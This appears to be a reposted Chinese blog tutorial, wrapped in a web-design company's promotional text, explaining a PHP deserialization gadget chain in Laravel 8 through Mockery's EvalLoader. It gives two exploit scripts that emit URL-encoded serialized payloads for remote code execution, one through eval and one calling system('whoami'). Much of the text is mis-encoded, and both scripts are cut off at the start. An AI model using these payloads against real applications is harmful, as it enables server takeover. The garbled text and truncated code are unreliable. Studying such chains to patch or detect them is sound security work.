本篇文章為大家展示了Laravel 8中怎么實(shí)現(xiàn)反序列化�����,內(nèi)容簡明扼要并且容易理解���,絕對能使你眼前一亮����,通過這篇文章的詳細(xì)介紹希望你能有所收獲。
成都創(chuàng)新互聯(lián)專注于廬江企業(yè)網(wǎng)站建設(shè),響應(yīng)式網(wǎng)站開發(fā),商城網(wǎng)站制作���。廬江網(wǎng)站建設(shè)公司,為廬江等地區(qū)提供建站服務(wù)����。全流程按需求定制網(wǎng)站���,專業(yè)設(shè)計(jì)�����,全程項(xiàng)目跟蹤��,成都創(chuàng)新互聯(lián)專業(yè)和態(tài)度為您提供的服務(wù)
text
首先還是老樣子�����,熟悉laravel的pop鏈的師傅肯定比較熟悉��,入口點(diǎn)還是PendingBroadcast.php中的析構(gòu)函數(shù)����;
public function __destruct()
{
$this->events->dispatch($this->event);
}這里很明顯可以控制任意類下的dispatch函數(shù);這里還是選擇Dispatcher.php進(jìn)行續(xù)鏈�;
public function dispatch($command)
{
return $this->queueResolver && $this->commandShouldBeQueued($command)
? $this->dispatchToQueue($command)
: $this->dispatchNow($command);
}這里簡單的看下源碼,感興趣的師傅可以拿著laravel5的源碼來進(jìn)行對比����,這里只不過是寫成了三元運(yùn)算的形式,本質(zhì)上還是一樣的�����,我們控制queueResolver變量和commandShouldBeQueued函數(shù)���,使其返回為真���,這樣就可進(jìn)入dispatchToQueue函數(shù)����;這里審計(jì)下類不難發(fā)現(xiàn)queueResolver是我們可控的變量,然而commandShouldBeQueued函數(shù)我們可以追溯一下�;
protected function commandShouldBeQueued($command)
{
return $command instanceof ShouldQueue;
}這里不難發(fā)現(xiàn),是需要我們的command是繼承ShouldQueue接口的類就可;所以全局搜索���;選擇BroadcastEvent.php的類�����;然后便可返回true���,然后進(jìn)入dispatchToQueue函數(shù);回溯一下dispatchToQueue函數(shù)���;
public function dispatchToQueue($command)
{
$connection = $command->connection ?? null;
$queue = call_user_func($this->queueResolver, $connection);可以發(fā)現(xiàn)這里有個(gè)危險(xiǎn)函數(shù)call_user_func����;可以直接實(shí)現(xiàn)任意類下的任意方法���;這里就可直接跳轉(zhuǎn)到我們想要執(zhí)行的方法下����;全局搜索一下eval方法��;發(fā)現(xiàn)存在�����;
class EvalLoader implements Loader
{
public function load(MockDefinition $definition)
{
if (class_exists($definition->getClassName(), false)) {
return;
}
eval("?>" . $definition->getCode());
}
}call_user_func函數(shù)在第一個(gè)參數(shù)為數(shù)組的時(shí)候,第一個(gè)參數(shù)就是我們選擇的類�,第二個(gè)參數(shù)是類下的方法;所以這里直接去到EvalLoader類����,去執(zhí)行l(wèi)oad方法從而調(diào)用到eval函數(shù);這里發(fā)現(xiàn)存在參數(shù)�����,而且參數(shù)必須是MockDefinition類的實(shí)例��;也即是意味著我們connection需要為MockDefinition類的實(shí)例���;
繼續(xù)審計(jì)發(fā)現(xiàn)�,必須if為false才會觸發(fā)eval方法����;所以這里我們需要直接追溯到MockDefinition類中;
class MockDefinition
{
protected $config;
protected $code;
public function __construct(MockConfiguration $config, $code)
{
if (!$config->getName()) {
throw new \InvalidArgumentException("MockConfiguration must contain a name");
}
$this->config = $config;
$this->code = $code;
}
public function getConfig()
{
return $this->config;
}
public function getClassName()
{
return $this->config->getName();
}
public function getCode()
{
return $this->code;
}
}看下getClassName函數(shù)��;這里的config是可控的�����,所以我們直接找到一個(gè)存在getName方法并且可控該方法的類����;全局搜索下找到MockConfiguration.php可以實(shí)現(xiàn);
protected $name;
public function getName()
{
return $this->name;
}因?yàn)樽詈笫且?jīng)過class_exit函數(shù)的判斷的��,所以我們可以直接控制其返回一個(gè)不存在的類���,就會造成false從而進(jìn)入eval方法���;繼續(xù)回到eval方法;
class EvalLoader implements Loader
{
public function load(MockDefinition $definition)
{
if (class_exists($definition->getClassName(), false)) {
return;
}
eval("?>" . $definition->getCode());
}
}這里還有個(gè)getCode方法���,我們通過上面的類也可審計(jì)getCode方法�����;code在MockDefinition類中也是可控的��,所以我們可以隨意的控制其內(nèi)容���,那么我們就可命令執(zhí)行���;放出我exp:
event = $event;
$this->events = $events;
}
}
}
namespace Illuminate\Bus{
class Dispatcher
{
protected $queueResolver;
public function __construct($queueResolver)
{
$this->queueResolver = $queueResolver;
}
}
}
namespace Illuminate\Broadcasting{
class BroadcastEvent
{
public $connection;
public function __construct($connection)
{
$this->connection = $connection;
}
}
}
namespace Mockery\Loader{
use Mockery\Generator\MockDefinition;
class EvalLoader
{
public function load(MockDefinition $definition)
{}
}
}
namespace Mockery\Generator{
class MockConfiguration
{
protected $name;
public function __construct($name){
$this->name = $name;
}
}
}
namespace Mockery\Generator{
class MockDefinition
{
protected $config;
protected $code;
public function __construct($config,$code)
{
$this->config = $config;
$this->code = $code;
}
}
}
namespace{
$e = new Mockery\Generator\MockConfiguration('s1mple');
$d = new Mockery\Loader\EvalLoader();
$f = new Mockery\Generator\MockDefinition($e,'');
$c = new Illuminate\Broadcasting\BroadcastEvent($f);
$a = new Illuminate\Bus\Dispatcher(array($d,"load"));
$b = new Illuminate\Broadcasting\PendingBroadcast($a,$c);
echo urlencode(serialize($b));
}這里為了節(jié)省時(shí)間,我最后用abcdef直接代替了���,造成rce����;
細(xì)心的師傅想必也發(fā)現(xiàn)了����;在最開始的call_user_func處,也是可以進(jìn)行命令執(zhí)行的�����;
public function dispatchToQueue($command)
{
$connection = $command->connection ?? null;
$queue = call_user_func($this->queueResolver, $connection);這里可以直接控制進(jìn)行命令執(zhí)行�;這個(gè)很簡單,就直接放出我exp吧����;
event = $event;
$this->events = $events;
}
}
}
namespace Illuminate\Bus{
class Dispatcher
{
protected $queueResolver;
public function __construct($queueResolver)
{
$this->queueResolver = $queueResolver;
}
}
}
namespace Illuminate\Broadcasting{
class BroadcastEvent
{
public $connection;
public function __construct($connection)
{
$this->connection = $connection;
}
}
}
namespace{
$c = new Illuminate\Broadcasting\BroadcastEvent('whoami');
$a = new Illuminate\Bus\Dispatcher('system');
$b = new Illuminate\Broadcasting\PendingBroadcast($a,$c);
echo urlencode(serialize($b));
}
上述內(nèi)容就是Laravel 8中怎么實(shí)現(xiàn)反序列化,你們學(xué)到知識或技能了嗎�����?如果還想學(xué)到更多技能或者豐富自己的知識儲備����,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。
新聞標(biāo)題:Laravel8中怎么實(shí)現(xiàn)反序列化
文章鏈接:
http://weahome.cn/article/jhscic.html
重慶分公司
重慶分公司
